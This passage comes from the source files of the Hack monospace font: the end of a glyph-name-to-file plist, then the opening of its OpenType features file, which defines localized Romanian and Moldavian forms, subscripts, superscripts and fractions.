<string>uni21B_2.glif</string> <key>uni21B3</key> <string>uni21B_3.glif</string> <key>uni21B4</key> <string>uni21B_4.glif</string> <key>uni21B6</key> <string>uni21B_6.glif</string> <key>uni21B7</key> <string>uni21B_7.glif</string> <key>uni21B8</key> <string>uni21B_8.glif</string> <key>uni21B9</key> <string>uni21B_9.glif</string> <key>uni21BA</key> <string>uni21B_A_.glif</string> <key>uni21BB</key> <string>uni21B_B_.glif</string> <key>uni21BC</key> <string>uni21B_C_.glif</string> <key>uni21BD</key> <string>uni21B_D_.glif</string> <key>uni21BE</key> <string>uni21B_E_.glif</string> <key>uni21BF</key> <string>uni21B_F_.glif</string> <key>uni21C0</key> <string>uni21C_0.glif</string> <key>uni21C1</key> <string>uni21C_1.glif</string> <key>uni21C2</key> <string>uni21C_2.glif</string> <key>uni21C3</key> <string>uni21C_3.glif</string> <key>uni21C4</key> <string>uni21C_4.glif</string> <key>uni21C5</key> <string>uni21C_5.glif</string> <key>uni21C6</key> <string>uni21C_6.glif</string> <key>uni21C7</key> <string>uni21C_7.glif</string> <key>uni21C8</key> <string>uni21C_8.glif</string> <key>uni21C9</key> <string>uni21C_9.glif</string> <key>uni21CA</key> <string>uni21C_A_.glif</string> <key>uni21CB</key> <string>uni21C_B_.glif</string> <key>uni21CC</key> <string>uni21C_C_.glif</string> <key>uni21CD</key> <string>uni21C_D_.glif</string> <key>uni21CE</key> <string>uni21C_E_.glif</string> <key>uni21CF</key> <string>uni21C_F_.glif</string> <key>uni21D5</key> <string>uni21D_5.glif</string> <key>uni21D6</key> <string>uni21D_6.glif</string> <key>uni21D7</key> <string>uni21D_7.glif</string> <key>uni21D8</key> <string>uni21D_8.glif</string> <key>uni21D9</key> <string>uni21D_9.glif</string> <key>uni21DA</key> <string>uni21D_A_.glif</string> <key>uni21DB</key> <string>uni21D_B_.glif</string> <key>uni21DC</key> <string>uni21D_C_.glif</string> <key>uni21DD</key> <string>uni21D_D_.glif</string> <key>uni21E0</key> <string>uni21E_0.glif</string> <key>uni21E1</key> <string>uni21E_1.glif</string> <key>uni21E2</key> <string>uni21E_2.glif</string> <key>uni21E3</key> <string>uni21E_3.glif</string> <key>uni21E4</key> <string>uni21E_4.glif</string> <key>uni21E5</key> <string>uni21E_5.glif</string> <key>uni21E6</key> <string>uni21E_6.glif</string> <key>uni21E7</key> <string>uni21E_7.glif</string> <key>uni21E8</key> <string>uni21E_8.glif</string> <key>uni21E9</key> <string>uni21E_9.glif</string> <key>uni21EB</key> <string>uni21E_B_.glif</string> <key>uni21EC</key> <string>uni21E_C_.glif</string> <key>uni21ED</key> <string>uni21E_D_.glif</string> <key>uni21EE</key> <string>uni21E_E_.glif</string> <key>uni21EF</key> <string>uni21E_F_.glif</string> <key>uni21F0</key> <string>uni21F_0.glif</string> <key>uni21F1</key> <string>uni21F_1.glif</string> <key>uni21F2</key> <string>uni21F_2.glif</string> <key>uni21F3</key> <string>uni21F_3.glif</string> <key>uni21F4</key> <string>uni21F_4.glif</string> <key>uni21F5</key> <string>uni21F_5.glif</string> <key>uni21F6</key> <string>uni21F_6.glif</string> <key>uni21F7</key> <string>uni21F_7.glif</string> <key>uni21F8</key> <string>uni21F_8.glif</string> <key>uni21F9</key> <string>uni21F_9.glif</string> <key>uni21FA</key> <string>uni21F_A_.glif</string> <key>uni21FB</key> <string>uni21F_B_.glif</string> <key>uni21FC</key> <string>uni21F_C_.glif</string> <key>uni21FD</key> <string>uni21F_D_.glif</string> <key>uni21FE</key> <string>uni21F_E_.glif</string> <key>uni21FF</key> <string>uni21F_F_.glif</string> <key>uni2201</key> <string>uni2201.glif</string> <key>uni2204</key> <string>uni2204.glif</string> <key>uni2206</key> <string>uni2206.glif</string> <key>uni220A</key> <string>uni220A_.glif</string> <key>uni220C</key> <string>uni220C_.glif</string> <key>uni220D</key> <string>uni220D_.glif</string> <key>uni220E</key> <string>uni220E_.glif</string> <key>uni2210</key> <string>uni2210.glif</string> <key>uni2213</key> <string>uni2213.glif</string> <key>uni2215</key> <string>uni2215.glif</string> <key>uni2218</key> <string>uni2218.glif</string> <key>uni2219</key> <string>uni2219.glif</string> <key>uni221B</key> <string>uni221B_.glif</string> <key>uni221C</key> <string>uni221C_.glif</string> <key>uni2223</key> <string>uni2223.glif</string> <key>uni222C</key> <string>uni222C_.glif</string> <key>uni222D</key> <string>uni222D_.glif</string> <key>uni2235</key> <string>uni2235.glif</string> <key>uni2236</key> <string>uni2236.glif</string> <key>uni2237</key> <string>uni2237.glif</string> <key>uni2238</key> <string>uni2238.glif</string> <key>uni2239</key> <string>uni2239.glif</string> <key>uni223A</key> <string>uni223A_.glif</string> <key>uni223B</key> <string>uni223B_.glif</string> <key>uni223D</key> <string>uni223D_.glif</string> <key>uni2241</key> <string>uni2241.glif</string> <key>uni2242</key> <string>uni2242.glif</string> <key>uni2243</key> <string>uni2243.glif</string> <key>uni2244</key> <string>uni2244.glif</string> <key>uni2246</key> <string>uni2246.glif</string> <key>uni2247</key> <string>uni2247.glif</string> <key>uni2249</key> <string>uni2249.glif</string> <key>uni224A</key> <string>uni224A_.glif</string> <key>uni224B</key> <string>uni224B_.glif</string> <key>uni224C</key> <string>uni224C_.glif</string> <key>uni224D</key> <string>uni224D_.glif</string> <key>uni224E</key> <string>uni224E_.glif</string> <key>uni224F</key> <string>uni224F_.glif</string> <key>uni2250</key> <string>uni2250.glif</string> <key>uni2251</key> <string>uni2251.glif</string> <key>uni2252</key> <string>uni2252.glif</string> <key>uni2253</key> <string>uni2253.glif</string> <key>uni2254</key> <string>uni2254.glif</string> <key>uni2255</key> <string>uni2255.glif</string> <key>uni2256</key> <string>uni2256.glif</string> <key>uni2257</key> <string>uni2257.glif</string> <key>uni2258</key> <string>uni2258.glif</string> <key>uni2259</key> <string>uni2259.glif</string> <key>uni225A</key> <string>uni225A_.glif</string> <key>uni225B</key> <string>uni225B_.glif</string> <key>uni225C</key> <string>uni225C_.glif</string> <key>uni225D</key> <string>uni225D_.glif</string> <key>uni225E</key> <string>uni225E_.glif</string> <key>uni225F</key> <string>uni225F_.glif</string> <key>uni2262</key> <string>uni2262.glif</string> <key>uni2263</key> <string>uni2263.glif</string> <key>uni2266</key> <string>uni2266.glif</string> <key>uni2267</key> <string>uni2267.glif</string> <key>uni2268</key> <string>uni2268.glif</string> <key>uni2269</key> <string>uni2269.glif</string> <key>uni226D</key> <string>uni226D_.glif</string> <key>uni226E</key> <string>uni226E_.glif</string> <key>uni226F</key> <string>uni226F_.glif</string> <key>uni2270</key> <string>uni2270.glif</string> <key>uni2271</key> <string>uni2271.glif</string> <key>uni2272</key> <string>uni2272.glif</string> <key>uni2273</key> <string>uni2273.glif</string> <key>uni2274</key> <string>uni2274.glif</string> <key>uni2275</key> <string>uni2275.glif</string> <key>uni2276</key> <string>uni2276.glif</string> <key>uni2277</key> <string>uni2277.glif</string> <key>uni2278</key> <string>uni2278.glif</string> <key>uni2279</key> <string>uni2279.glif</string> <key>uni227A</key> <string>uni227A_.glif</string> <key>uni227B</key> <string>uni227B_.glif</string> <key>uni227C</key> <string>uni227C_.glif</string> <key>uni227D</key> <string>uni227D_.glif</string> <key>uni227E</key> <string>uni227E_.glif</string> <key>uni227F</key> <string>uni227F_.glif</string> <key>uni2280</key> <string>uni2280.glif</string> <key>uni2281</key> <string>uni2281.glif</string> <key>uni2285</key> <string>uni2285.glif</string> <key>uni2288</key> <string>uni2288.glif</string> <key>uni2289</key> <string>uni2289.glif</string> <key>uni228A</key> <string>uni228A_.glif</string> <key>uni228B</key> <string>uni228B_.glif</string> <key>uni228D</key> <string>uni228D_.glif</string> <key>uni228E</key> <string>uni228E_.glif</string> <key>uni228F</key> <string>uni228F_.glif</string> <key>uni2290</key> <string>uni2290.glif</string> <key>uni2291</key> <string>uni2291.glif</string> <key>uni2292</key> <string>uni2292.glif</string> <key>uni2293</key> <string>uni2293.glif</string> <key>uni2294</key> <string>uni2294.glif</string> <key>uni2296</key> <string>uni2296.glif</string> <key>uni2298</key> <string>uni2298.glif</string> <key>uni2299</key> <string>uni2299.glif</string> <key>uni229A</key> <string>uni229A_.glif</string> <key>uni229B</key> <string>uni229B_.glif</string> <key>uni229C</key> <string>uni229C_.glif</string> <key>uni229D</key> <string>uni229D_.glif</string> <key>uni229E</key> <string>uni229E_.glif</string> <key>uni229F</key> <string>uni229F_.glif</string> <key>uni22A0</key> <string>uni22A_0.glif</string> <key>uni22A1</key> <string>uni22A_1.glif</string> <key>uni22A2</key> <string>uni22A_2.glif</string> <key>uni22A3</key> <string>uni22A_3.glif</string> <key>uni22A4</key> <string>uni22A_4.glif</string> <key>uni22B2</key> <string>uni22B_2.glif</string> <key>uni22B3</key> <string>uni22B_3.glif</string> <key>uni22B4</key> <string>uni22B_4.glif</string> <key>uni22B5</key> <string>uni22B_5.glif</string> <key>uni22B8</key> <string>uni22B_8.glif</string> <key>uni22C2</key> <string>uni22C_2.glif</string> <key>uni22C3</key> <string>uni22C_3.glif</string> <key>uni22C4</key> <string>uni22C_4.glif</string> <key>uni22C6</key> <string>uni22C_6.glif</string> <key>uni22CD</key> <string>uni22C_D_.glif</string> <key>uni22CE</key> <string>uni22C_E_.glif</string> <key>uni22CF</key> <string>uni22C_F_.glif</string> <key>uni22D0</key> <string>uni22D_0.glif</string> <key>uni22D1</key> <string>uni22D_1.glif</string> <key>uni22DA</key> <string>uni22D_A_.glif</string> <key>uni22DB</key> <string>uni22D_B_.glif</string> <key>uni22DC</key> <string>uni22D_C_.glif</string> <key>uni22DD</key> <string>uni22D_D_.glif</string> <key>uni22DE</key> <string>uni22D_E_.glif</string> <key>uni22DF</key> <string>uni22D_F_.glif</string> <key>uni22E0</key> <string>uni22E_0.glif</string> <key>uni22E1</key> <string>uni22E_1.glif</string> <key>uni22E2</key> <string>uni22E_2.glif</string> <key>uni22E3</key> <string>uni22E_3.glif</string> <key>uni22E4</key> <string>uni22E_4.glif</string> <key>uni22E5</key> <string>uni22E_5.glif</string> <key>uni22E6</key> <string>uni22E_6.glif</string> <key>uni22E7</key> <string>uni22E_7.glif</string> <key>uni22E8</key> <string>uni22E_8.glif</string> <key>uni22E9</key> <string>uni22E_9.glif</string> <key>uni22EF</key> <string>uni22E_F_.glif</string> <key>uni2304</key> <string>uni2304.glif</string> <key>uni2308</key> <string>uni2308.glif</string> <key>uni2309</key> <string>uni2309.glif</string> <key>uni230A</key> <string>uni230A_.glif</string> <key>uni230B</key> <string>uni230B_.glif</string> <key>uni239B</key> <string>uni239B_.glif</string> <key>uni239C</key> <string>uni239C_.glif</string> <key>uni239D</key> <string>uni239D_.glif</string> <key>uni239E</key> <string>uni239E_.glif</string> <key>uni239F</key> <string>uni239F_.glif</string> <key>uni23A0</key> <string>uni23A_0.glif</string> <key>uni23A1</key> <string>uni23A_1.glif</string> <key>uni23A2</key> <string>uni23A_2.glif</string> <key>uni23A3</key> <string>uni23A_3.glif</string> <key>uni23A4</key> <string>uni23A_4.glif</string> <key>uni23A5</key> <string>uni23A_5.glif</string> <key>uni23A6</key> <string>uni23A_6.glif</string> <key>uni23A7</key> <string>uni23A_7.glif</string> <key>uni23A8</key> <string>uni23A_8.glif</string> <key>uni23A9</key> <string>uni23A_9.glif</string> <key>uni23AA</key> <string>uni23A_A_.glif</string> <key>uni23AB</key> <string>uni23A_B_.glif</string> <key>uni23AC</key> <string>uni23A_C_.glif</string> <key>uni23AD</key> <string>uni23A_D_.glif</string> <key>uni23AE</key> <string>uni23A_E_.glif</string> <key>uni2500</key> <string>uni2500.glif</string> <key>uni2501</key> <string>uni2501.glif</string> <key>uni2502</key> <string>uni2502.glif</string> <key>uni2503</key> <string>uni2503.glif</string> <key>uni2504</key> <string>uni2504.glif</string> <key>uni2505</key> <string>uni2505.glif</string> <key>uni2506</key> <string>uni2506.glif</string> <key>uni2507</key> <string>uni2507.glif</string> <key>uni2508</key> <string>uni2508.glif</string> <key>uni2509</key> <string>uni2509.glif</string> <key>uni250A</key> <string>uni250A_.glif</string> <key>uni250B</key> <string>uni250B_.glif</string> <key>uni250C</key> <string>uni250C_.glif</string> <key>uni250D</key> <string>uni250D_.glif</string> <key>uni250E</key> <string>uni250E_.glif</string> <key>uni250F</key> <string>uni250F_.glif</string> <key>uni2510</key> <string>uni2510.glif</string> <key>uni2511</key> <string>uni2511.glif</string> <key>uni2512</key> <string>uni2512.glif</string> <key>uni2513</key> <string>uni2513.glif</string> <key>uni2514</key> <string>uni2514.glif</string> <key>uni2515</key> <string>uni2515.glif</string> <key>uni2516</key> <string>uni2516.glif</string> <key>uni2517</key> <string>uni2517.glif</string> <key>uni2518</key> <string>uni2518.glif</string> <key>uni2519</key> <string>uni2519.glif</string> <key>uni251A</key> <string>uni251A_.glif</string> <key>uni251B</key> <string>uni251B_.glif</string> <key>uni251C</key> <string>uni251C_.glif</string> <key>uni251D</key> <string>uni251D_.glif</string> <key>uni251E</key> <string>uni251E_.glif</string> <key>uni251F</key> <string>uni251F_.glif</string> <key>uni2520</key> <string>uni2520.glif</string> <key>uni2521</key> <string>uni2521.glif</string> <key>uni2522</key> <string>uni2522.glif</string> <key>uni2523</key> <string>uni2523.glif</string> <key>uni2524</key> <string>uni2524.glif</string> <key>uni2525</key> <string>uni2525.glif</string> <key>uni2526</key> <string>uni2526.glif</string> <key>uni2527</key> <string>uni2527.glif</string> <key>uni2528</key> <string>uni2528.glif</string> <key>uni2529</key> <string>uni2529.glif</string> <key>uni252A</key> <string>uni252A_.glif</string> <key>uni252B</key> <string>uni252B_.glif</string> <key>uni252C</key> <string>uni252C_.glif</string> <key>uni252D</key> <string>uni252D_.glif</string> <key>uni252E</key> <string>uni252E_.glif</string> <key>uni252F</key> <string>uni252F_.glif</string> <key>uni2530</key> <string>uni2530.glif</string> <key>uni2531</key> <string>uni2531.glif</string> <key>uni2532</key> <string>uni2532.glif</string> <key>uni2533</key> <string>uni2533.glif</string> <key>uni2534</key> <string>uni2534.glif</string> <key>uni2535</key> <string>uni2535.glif</string> <key>uni2536</key> <string>uni2536.glif</string> <key>uni2537</key> <string>uni2537.glif</string> <key>uni2538</key> <string>uni2538.glif</string> <key>uni2539</key> <string>uni2539.glif</string> <key>uni253A</key> <string>uni253A_.glif</string> <key>uni253B</key> <string>uni253B_.glif</string> <key>uni253C</key> <string>uni253C_.glif</string> <key>uni253D</key> <string>uni253D_.glif</string> <key>uni253E</key> <string>uni253E_.glif</string> <key>uni253F</key> <string>uni253F_.glif</string> <key>uni2540</key> <string>uni2540.glif</string> <key>uni2541</key> <string>uni2541.glif</string> <key>uni2542</key> <string>uni2542.glif</string> <key>uni2543</key> <string>uni2543.glif</string> <key>uni2544</key> <string>uni2544.glif</string> <key>uni2545</key> <string>uni2545.glif</string> <key>uni2546</key> <string>uni2546.glif</string> <key>uni2547</key> <string>uni2547.glif</string> <key>uni2548</key> <string>uni2548.glif</string> <key>uni2549</key> <string>uni2549.glif</string> <key>uni254A</key> <string>uni254A_.glif</string> <key>uni254B</key> <string>uni254B_.glif</string> <key>uni254C</key> <string>uni254C_.glif</string> <key>uni254D</key> <string>uni254D_.glif</string> <key>uni254E</key> <string>uni254E_.glif</string> <key>uni254F</key> <string>uni254F_.glif</string> <key>uni2550</key> <string>uni2550.glif</string> <key>uni2551</key> <string>uni2551.glif</string> <key>uni2552</key> <string>uni2552.glif</string> <key>uni2553</key> <string>uni2553.glif</string> <key>uni2554</key> <string>uni2554.glif</string> <key>uni2555</key> <string>uni2555.glif</string> <key>uni2556</key> <string>uni2556.glif</string> <key>uni2557</key> <string>uni2557.glif</string> <key>uni2558</key> <string>uni2558.glif</string> <key>uni2559</key> <string>uni2559.glif</string> <key>uni255A</key> <string>uni255A_.glif</string> <key>uni255B</key> <string>uni255B_.glif</string> <key>uni255C</key> <string>uni255C_.glif</string> <key>uni255D</key> <string>uni255D_.glif</string> <key>uni255E</key> <string>uni255E_.glif</string> <key>uni255F</key> <string>uni255F_.glif</string> <key>uni2560</key> <string>uni2560.glif</string> <key>uni2561</key> <string>uni2561.glif</string> <key>uni2562</key> <string>uni2562.glif</string> <key>uni2563</key> <string>uni2563.glif</string> <key>uni2564</key> <string>uni2564.glif</string> <key>uni2565</key> <string>uni2565.glif</string> <key>uni2566</key> <string>uni2566.glif</string> <key>uni2567</key> <string>uni2567.glif</string> <key>uni2568</key> <string>uni2568.glif</string> <key>uni2569</key> <string>uni2569.glif</string> <key>uni256A</key> <string>uni256A_.glif</string> <key>uni256B</key> <string>uni256B_.glif</string> <key>uni256C</key> <string>uni256C_.glif</string> <key>uni256D</key> <string>uni256D_.glif</string> <key>uni256E</key> <string>uni256E_.glif</string> <key>uni256F</key> <string>uni256F_.glif</string> <key>uni2570</key> <string>uni2570.glif</string> <key>uni2571</key> <string>uni2571.glif</string> <key>uni2572</key> <string>uni2572.glif</string> <key>uni2573</key> <string>uni2573.glif</string> <key>uni2574</key> <string>uni2574.glif</string> <key>uni2575</key> <string>uni2575.glif</string> <key>uni2576</key> <string>uni2576.glif</string> <key>uni2577</key> <string>uni2577.glif</string> <key>uni2578</key> <string>uni2578.glif</string> <key>uni2579</key> <string>uni2579.glif</string> <key>uni257A</key> <string>uni257A_.glif</string> <key>uni257B</key> <string>uni257B_.glif</string> <key>uni257C</key> <string>uni257C_.glif</string> <key>uni257D</key> <string>uni257D_.glif</string> <key>uni257E</key> <string>uni257E_.glif</string> <key>uni257F</key> <string>uni257F_.glif</string> <key>uni2581</key> <string>uni2581.glif</string> <key>uni2582</key> <string>uni2582.glif</string> <key>uni2583</key> <string>uni2583.glif</string> <key>uni2585</key> <string>uni2585.glif</string> <key>uni2586</key> <string>uni2586.glif</string> <key>uni2587</key> <string>uni2587.glif</string> <key>uni2589</key> <string>uni2589.glif</string> <key>uni258A</key> <string>uni258A_.glif</string> <key>uni258B</key> <string>uni258B_.glif</string> <key>uni258D</key> <string>uni258D_.glif</string> <key>uni258E</key> <string>uni258E_.glif</string> <key>uni258F</key> <string>uni258F_.glif</string> <key>uni2594</key> <string>uni2594.glif</string> <key>uni2595</key> <string>uni2595.glif</string> <key>uni2596</key> <string>uni2596.glif</string> <key>uni2597</key> <string>uni2597.glif</string> <key>uni2598</key> <string>uni2598.glif</string> <key>uni2599</key> <string>uni2599.glif</string> <key>uni259A</key> <string>uni259A_.glif</string> <key>uni259B</key> <string>uni259B_.glif</string> <key>uni259C</key> <string>uni259C_.glif</string> <key>uni259D</key> <string>uni259D_.glif</string> <key>uni259E</key> <string>uni259E_.glif</string> <key>uni259F</key> <string>uni259F_.glif</string> <key>uni25A1</key> <string>uni25A_1.glif</string> <key>uni25A2</key> <string>uni25A_2.glif</string> <key>uni25A3</key> <string>uni25A_3.glif</string> <key>uni25A4</key> <string>uni25A_4.glif</string> <key>uni25A5</key> <string>uni25A_5.glif</string> <key>uni25A6</key> <string>uni25A_6.glif</string> <key>uni25A7</key> <string>uni25A_7.glif</string> <key>uni25A8</key> <string>uni25A_8.glif</string> <key>uni25A9</key> <string>uni25A_9.glif</string> <key>uni25AA</key> <string>uni25A_A_.glif</string> <key>uni25AB</key> <string>uni25A_B_.glif</string> <key>uni25AD</key> <string>uni25A_D_.glif</string> <key>uni25AE</key> <string>uni25A_E_.glif</string> <key>uni25AF</key> <string>uni25A_F_.glif</string> <key>uni25B0</key> <string>uni25B_0.glif</string> <key>uni25B1</key> <string>uni25B_1.glif</string> <key>uni25B3</key> <string>uni25B_3.glif</string> <key>uni25B4</key> <string>uni25B_4.glif</string> <key>uni25B5</key> <string>uni25B_5.glif</string> <key>uni25B6</key> <string>uni25B_6.glif</string> <key>uni25B7</key> <string>uni25B_7.glif</string> <key>uni25B8</key> <string>uni25B_8.glif</string> <key>uni25B9</key> <string>uni25B_9.glif</string> <key>uni25BB</key> <string>uni25B_B_.glif</string> <key>uni25BD</key> <string>uni25B_D_.glif</string> <key>uni25BE</key> <string>uni25B_E_.glif</string> <key>uni25BF</key> <string>uni25B_F_.glif</string> <key>uni25C0</key> <string>uni25C_0.glif</string> <key>uni25C1</key> <string>uni25C_1.glif</string> <key>uni25C2</key> <string>uni25C_2.glif</string> <key>uni25C3</key> <string>uni25C_3.glif</string> <key>uni25C5</key> <string>uni25C_5.glif</string> <key>uni25C6</key> <string>uni25C_6.glif</string> <key>uni25C7</key> <string>uni25C_7.glif</string> <key>uni25C8</key> <string>uni25C_8.glif</string> <key>uni25C9</key> <string>uni25C_9.glif</string> <key>uni25CC</key> <string>uni25C_C_.glif</string> <key>uni25CD</key> <string>uni25C_D_.glif</string> <key>uni25CE</key> <string>uni25C_E_.glif</string> <key>uni25CF</key> <string>uni25C_F_.glif</string> <key>uni25D0</key> <string>uni25D_0.glif</string> <key>uni25D1</key> <string>uni25D_1.glif</string> <key>uni25D2</key> <string>uni25D_2.glif</string> <key>uni25D3</key> <string>uni25D_3.glif</string> <key>uni25D4</key> <string>uni25D_4.glif</string> <key>uni25D5</key> <string>uni25D_5.glif</string> <key>uni25D6</key> <string>uni25D_6.glif</string> <key>uni25D7</key> <string>uni25D_7.glif</string> <key>uni25DA</key> <string>uni25D_A_.glif</string> <key>uni25DB</key> <string>uni25D_B_.glif</string> <key>uni25DC</key> <string>uni25D_C_.glif</string> <key>uni25DD</key> <string>uni25D_D_.glif</string> <key>uni25DE</key> <string>uni25D_E_.glif</string> <key>uni25DF</key> <string>uni25D_F_.glif</string> <key>uni25E0</key> <string>uni25E_0.glif</string> <key>uni25E1</key> <string>uni25E_1.glif</string> <key>uni25E2</key> <string>uni25E_2.glif</string> <key>uni25E3</key> <string>uni25E_3.glif</string> <key>uni25E4</key> <string>uni25E_4.glif</string> <key>uni25E5</key> <string>uni25E_5.glif</string> <key>uni25E7</key> <string>uni25E_7.glif</string> <key>uni25E8</key> <string>uni25E_8.glif</string> <key>uni25E9</key> <string>uni25E_9.glif</string> <key>uni25EA</key> <string>uni25E_A_.glif</string> <key>uni25EB</key> <string>uni25E_B_.glif</string> <key>uni25EC</key> <string>uni25E_C_.glif</string> <key>uni25ED</key> <string>uni25E_D_.glif</string> <key>uni25EE</key> <string>uni25E_E_.glif</string> <key>uni25EF</key> <string>uni25E_F_.glif</string> <key>uni25F0</key> <string>uni25F_0.glif</string> <key>uni25F1</key> <string>uni25F_1.glif</string> <key>uni25F2</key> <string>uni25F_2.glif</string> <key>uni25F3</key> <string>uni25F_3.glif</string> <key>uni25F4</key> <string>uni25F_4.glif</string> <key>uni25F5</key> <string>uni25F_5.glif</string> <key>uni25F6</key> <string>uni25F_6.glif</string> <key>uni25F7</key> <string>uni25F_7.glif</string> <key>uni25F8</key> <string>uni25F_8.glif</string> <key>uni25F9</key> <string>uni25F_9.glif</string> <key>uni25FA</key> <string>uni25F_A_.glif</string> <key>uni25FB</key> <string>uni25F_B_.glif</string> <key>uni25FC</key> <string>uni25F_C_.glif</string> <key>uni25FD</key> <string>uni25F_D_.glif</string> <key>uni25FE</key> <string>uni25F_E_.glif</string> <key>uni25FF</key> <string>uni25F_F_.glif</string> <key>uni27C2</key> <string>uni27C_2.glif</string> <key>uni27C5</key> <string>uni27C_5.glif</string> <key>uni27C6</key> <string>uni27C_6.glif</string> <key>uni27DC</key> <string>uni27D_C_.glif</string> <key>uni27E0</key> <string>uni27E_0.glif</string> <key>uni27E6</key> <string>uni27E_6.glif</string> <key>uni27E7</key> <string>uni27E_7.glif</string> <key>uni27E8</key> <string>uni27E_8.glif</string> <key>uni27E9</key> <string>uni27E_9.glif</string> <key>uni27EA</key> <string>uni27E_A_.glif</string> <key>uni27EB</key> <string>uni27E_B_.glif</string> <key>uni27F5</key> <string>uni27F_5.glif</string> <key>uni27F6</key> <string>uni27F_6.glif</string> <key>uni27F7</key> <string>uni27F_7.glif</string> <key>uni2987</key> <string>uni2987.glif</string> <key>uni2988</key> <string>uni2988.glif</string> <key>uni2997</key> <string>uni2997.glif</string> <key>uni2998</key> <string>uni2998.glif</string> <key>uni29EB</key> <string>uni29E_B_.glif</string> <key>uni29FA</key> <string>uni29F_A_.glif</string> <key>uni29FB</key> <string>uni29F_B_.glif</string> <key>uni2A00</key> <string>uni2A_00.glif</string> <key>uni2A2F</key> <string>uni2A_2F_.glif</string> <key>uni2A6A</key> <string>uni2A_6A_.glif</string> <key>uni2A6B</key> <string>uni2A_6B_.glif</string> <key>uni2B05</key> <string>uni2B_05.glif</string> <key>uni2B06</key> <string>uni2B_06.glif</string> <key>uni2B07</key> <string>uni2B_07.glif</string> <key>uni2B08</key> <string>uni2B_08.glif</string> <key>uni2B09</key> <string>uni2B_09.glif</string> <key>uni2B0A</key> <string>uni2B_0A_.glif</string> <key>uni2B0B</key> <string>uni2B_0B_.glif</string> <key>uni2B0C</key> <string>uni2B_0C_.glif</string> <key>uni2B0D</key> <string>uni2B_0D_.glif</string> <key>uni2B16</key> <string>uni2B_16.glif</string> <key>uni2B17</key> <string>uni2B_17.glif</string> <key>uni2B18</key> <string>uni2B_18.glif</string> <key>uni2B19</key> <string>uni2B_19.glif</string> <key>uni2B1A</key> <string>uni2B_1A_.glif</string> <key>uni2C7D</key> <string>uni2C_7D_.glif</string> <key>uni2E18</key> <string>uni2E_18.glif</string> <key>uni2E18.case</key> <string>uni2E_18.case.glif</string> <key>uni2E1F</key> <string>uni2E_1F_.glif</string> <key>uni2E22</key> <string>uni2E_22.glif</string> <key>uni2E23</key> <string>uni2E_23.glif</string> <key>uni2E24</key> <string>uni2E_24.glif</string> <key>uni2E25</key> <string>uni2E_25.glif</string> <key>uni2E2E</key> <string>uni2E_2E_.glif</string> <key>uniE0A0</key> <string>uniE_0A_0.glif</string> <key>uniE0A1</key> <string>uniE_0A_1.glif</string> <key>uniE0A2</key> <string>uniE_0A_2.glif</string> <key>uniE0B0</key> <string>uniE_0B_0.glif</string> <key>uniE0B1</key> <string>uniE_0B_1.glif</string> <key>uniE0B2</key> <string>uniE_0B_2.glif</string> <key>uniE0B3</key> <string>uniE_0B_3.glif</string> <key>uniFEFF</key> <string>uniF_E_F_F_.glif</string> <key>union</key> <string>union.glif</string> <key>universal</key> <string>universal.glif</string> <key>uogonek</key> <string>uogonek.glif</string> <key>upblock</key> <string>upblock.glif</string> <key>upsilon</key> <string>upsilon.glif</string> <key>upsilondieresis</key> <string>upsilondieresis.glif</string> <key>upsilondieresistonos</key> <string>upsilondieresistonos.glif</string> <key>upsilontonos</key> <string>upsilontonos.glif</string> <key>uring</key> <string>uring.glif</string> <key>utilde</key> <string>utilde.glif</string> <key>v</key> <string>v.glif</string> <key>w</key> <string>w.glif</string> <key>wacute</key> <string>wacute.glif</string> <key>wcircumflex</key> <string>wcircumflex.glif</string> <key>wdieresis</key> <string>wdieresis.glif</string> <key>wgrave</key> <string>wgrave.glif</string> <key>x</key> <string>x.glif</string> <key>xi</key> <string>xi.glif</string> <key>y</key> <string>y.glif</string> <key>yacute</key> <string>yacute.glif</string> <key>ycircumflex</key> <string>ycircumflex.glif</string> <key>ydieresis</key> <string>ydieresis.glif</string> <key>yen</key> <string>yen.glif</string> <key>ygrave</key> <string>ygrave.glif</string> <key>z</key> <string>z.glif</string> <key>zacute</key> <string>zacute.glif</string> <key>zcaron</key> <string>zcaron.glif</string> <key>zdotaccent</key> <string>zdotaccent.glif</string> <key>zero</key> <string>zero.glif</string> <key>zero.subs</key> <string>zero.subs.glif</string> <key>zeta</key> <string>zeta.glif</string> </dict> </plist>
Hack/source/Hack-Regular.ufo/features.fea
# Prefix: Languagesystems languagesystem DFLT dflt; languagesystem latn dflt; languagesystem latn MOL ; languagesystem latn ROM ; # Prefix: Prefix @aalt1 = [\zero \one \two \three \four \five \six \seven \eight \nine]; @subs1 = [\zero.subs \one.subs \two.subs \three.subs \four.subs \five.subs \six.subs \seven.subs \eight.subs \nine.subs]; @sups1 = [\uni2070 \uni00B9 \uni00B2 \uni00B3 \uni2074 \uni2075 \uni2076 \uni2077 \uni2078 \uni2079]; # @case1 = [\exclamdown \questiondown \uni2E18 \uni0304 \uni0306 \uni0307 \uni030B \uni030F \uni0311]; # @case2 = [\exclamdown.case \questiondown.case \uni2E18.case \uni0304.case \uni0306.case \uni0307.case \uni030B.case \uni030F.case \uni0311.case]; feature aalt { feature locl; feature subs; feature sinf; feature sups; feature ordn; } aalt; feature locl { # Localized Forms script latn; # Latin language MOL exclude_dflt; # Moldavian sub [Scedilla scedilla] by [uni0218 uni0219]; language ROM exclude_dflt; # Romanian sub [Scedilla scedilla] by [uni0218 uni0219]; } locl; feature subs { # Subscript # DEFAULT sub @aalt1 by @subs1; script latn; # Latin sub @aalt1 by @subs1; language MOL ; # Moldavian language ROM ; # Romanian } subs; feature sinf { # Scientific Inferiors # DEFAULT sub @aalt1 by @subs1; script latn; # Latin sub @aalt1 by @subs1; language MOL ; # Moldavian language ROM ; # Romanian } sinf; feature sups { # Superscript # DEFAULT sub @aalt1 by @sups1; script latn; # Latin sub @aalt1 by @sups1; language MOL ; # Moldavian language ROM ; # Romanian } sups; feature frac { # Fractions # DEFAULT sub one slash two by onehalf; sub one slash three by uni2153; sub one slash four by onequarter; sub one slash five by uni2155; sub one slash six by uni2159; sub one slash eight by oneeighth; sub two slash three by uni2154; sub two slash five by uni2156; sub three slash four by threequarters; sub three slash five by uni2157; sub three slash eight by threeeighths; sub four slash five by uni2158; sub five slash six by uni215A; sub five slash eight by fiveeighths; sub seven slash eight by seveneighths; script latn; # Latin sub one slash two by onehalf; sub one slash three by uni2153; sub one slash four by onequarter; sub one slash five by uni2155; sub one slash six by uni2159; sub one slash eight by oneeighth; sub two slash three by uni2154; sub two slash five by uni2156; sub three slash four by threequarters; sub three slash five by uni2157; sub three slash eight by threeeighths; sub four slash five by uni2158; sub five slash six by uni215A; sub five slash eight by fiveeighths; sub seven slash eight by seveneighths; language 